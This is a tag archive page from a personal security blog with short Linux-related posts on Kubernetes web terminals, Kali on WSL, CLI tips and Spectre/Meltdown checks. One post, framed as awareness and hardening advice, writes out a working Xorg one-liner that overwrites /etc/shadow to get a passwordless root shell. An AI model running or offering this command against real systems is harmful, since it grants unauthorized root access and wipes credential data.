linux « #!/zitstif.no-ip.org/

Tag: linux

kubernetes.io web terminal root shell

by zitstif on Jan.01, 2020, under Posts

Recently, I’ve been reading up on containers and kubernetes. I have just discovered this. It just seems like it could be easily abused:

No authentication necessary. You simply click on Launch Terminal and you’ll get a root shell with full internet access.

https://kubernetes.io/docs/tutorials/hello-minikube/

(This is a frame from https://www.katacoda.com/ )

Leave a Comment :container, dmidecode, docker, hyper-v, kubernetes, linux, qemu, ubuntu k8, web more...

eXploit X : “Give Me Root” – Computerphile

by zitstif on Nov.11, 2018, under Code, Exploits, Posts, Videos

Example of exploit: cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su

This is just another reason why if you run a headless server, to not have Xorg or a GUI installed. Reduce the attack surface as much as you can.

Leave a Comment :attack surface, cd, Computerphile, give me root, linux, nix, root, root exploit, unix, xorg more...

Kali Linux for WSL now available on Windows Store

by zitstif on Mar.06, 2018, under Posts

This is pretty neat:

https://tech.slashdot.org/story/18/03/06/1334255/kali-linux-for-wsl-now-available-in-the-windows-store

However, I have a couple concerns. First, how useful will it be? Currently on a Windows 10 system, I have WSL setup and nmap is essentially useless:

tester@Win10virtual:~$ sudo nmap -sP -n -T4 192.168.1.254

Starting Nmap 7.01 ( https://nmap.org ) at 2018-03-06 14:10 STD
dnet: Failed to open device eth0
QUITTING!

There is discussion about this issue here:

https://github.com/Microsoft/WSL/issues/1349

There is discussion of other network tools having socket related issues.

Second, how will AV handle tools like metasploit, powersploit, social engineering toolkit and the like that may set off AV engines?

I honestly think WSL is awesome but at this point I would recommend running whatever Linux distro of your desire on VirtualBox or the like.

Leave a Comment :kali, kali linux, kali on windows, kali on Windows 10, linux, nmap, windows 10, windows store, wsl more...

“Moving efficiently in the CLI” – CLÉMENT CHASTAGNOL

by zitstif on Jan.26, 2018, under Posts

https://clementc.github.io/blog/2018/01/25/moving_cli/

Leave a Comment :bash, CLI, command, command line, CUI, linux, shell more...

nixCraft – How to check Linux for Spectre and Meltdown vulnerability

by zitstif on Jan.09, 2018, under Posts

Great article:

https://www.cyberciti.biz/faq/check-linux-server-for-spectre-meltdown-vulnerability/

Intel has also released a microcode update:

https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File

How does it affect performance on Windows systems? According to Microsoft:

https://cloudblogs.microsoft.com/microsoftsecure/2018/01/09/understanding-the-performance-impact-of-spectre-and-meltdown-mitigations-on-windows-systems/

#Update 1/17/2018 Tool for checking on Windows systems:

http://www.guru3d.com/news-story/download-inspectre-meltdown-and-spectre-check-tool.html

sha1sum ‘[Guru3D]-InSpectre.exe’
6a3f1382f3c9c1fd53bf4c3708e3a449cbcb136f [Guru3D]-InSpectre.exe

Leave a Comment :intel, linux, low level exploit, meltdown, microcode, spectre, vulnerability more...

« Older Entries

Categories
- Blacklists
- Code
- Exploits
- Lock Picking
- Meterpreter Scripts
- Posts
- Tools
- Uncategorized
- Videos

#!/zitstif.no-ip.org/

Tag: linux

kubernetes.io web terminal root shell

eXploit X : “Give Me Root” – Computerphile

Kali Linux for WSL now available on Windows Store

“Moving efficiently in the CLI” – CLÉMENT CHASTAGNOL

nixCraft – How to check Linux for Spectre and Meltdown vulnerability

Welcome to #!/zitstif.no-ip.org/

Recent Posts

Browse by tags

Categories

Calender

Blogroll

Looking for something?

Archives